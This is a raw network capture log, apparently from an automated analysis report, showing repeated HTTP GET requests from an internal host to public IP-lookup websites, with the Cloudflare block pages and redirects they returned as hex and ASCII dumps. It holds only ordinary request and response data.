                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038db1c7ca689-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335702896 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335825920 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335880995 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 38 64 62 31 63 37 63 61 36 38 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3038db1c7ca689</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    53192.168.11.3049924104.19.223.7980
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.536031961 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681519985 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:41 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:40:56 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=R.k1EjMfwQgTcDAR7aOiHCEUxF3je0_1LAbNJSfr2hY-1728999641-1.0.1.1-hpT_lPPXA6iDgRL3peV9w1XsZWO4bh4fJPtetgMjszkNtTwNJCdhW57tQvO2Zn5V_63zqe99GkHtCuMhWQE6Qw; path=/; expires=Tue, 15-Oct-24 14:10:41 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038efff7031da-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681618929 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681668043 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681732893 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 38 65 66 66 66 37 30 33 31 64 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3038efff7031da</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    54192.168.11.3049927172.67.155.17580
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.426250935 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.570031881 CEST878INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:43 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:43 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q9sLPVYmJ1KEFvqdC5ZOkKhpbCS1MWS6%2B%2FOa2VvQtAv60EtQa8TqCKGzENP4g6HaS1Nu362d4RLgViVCUPH7%2FjpXoRGs3GuHBF5IRL8f2bg2WXZafqcadhTBznUU8uSbPfVYCOARgOTTTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038fbc9528df4-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    55192.168.11.3049932104.27.207.9280
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.146018982 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.292885065 CEST853INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:47 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:47 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKaAg4NyBcjlsYWyFMO1479SKjPB1B6b4n7O3nMmPEe%2FvgllvnQXxPzgxwyID%2FzkNz3kiZeD9TEdy8xGqWBEfEMb8J7C1rhDaIwxpnnWzNEHHRVhul7ovkDjWqfzebRMGnTdcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3039130b09b3e5-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    56192.168.11.3049937104.19.223.7980
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.485524893 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649286985 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:50 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:41:05 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=L9ZRP8axm0tU__VmuLOhxu8CGxXdjdQqpRsZYn.FkzA-1728999650-1.0.1.1-FZjCQS4a00.yI2KAbXeR8X1BDQ1elTMPrDfNh8Pjoft02bGGUXT_zLhINCcGqU.necUnLQXr4jmkcg.N_AUOGA; path=/; expires=Tue, 15-Oct-24 14:10:50 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d303927fb620318-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649399996 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649415016 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649532080 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 39 32 37 66 62 36 32 30 33 31 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d303927fb620318</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    57192.168.11.3049941104.19.223.7980
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.671242952 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821479082 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:53 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:41:08 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=VxVcVL.bDTBTwsANTKK5hYvjky_kE9jqeEGOM8rC_ng-1728999653-1.0.1.1-i51nPqjDsVO5mvKMCy6Q6KaORH_RDD3IzJRoyXRz_XfADhj62xDY4hlpk9v7emruHT5NoCBSLVVGQEtKT0Ndqg; path=/; expires=Tue, 15-Oct-24 14:10:53 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30393bdf37b3d9-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821572065 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821587086 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
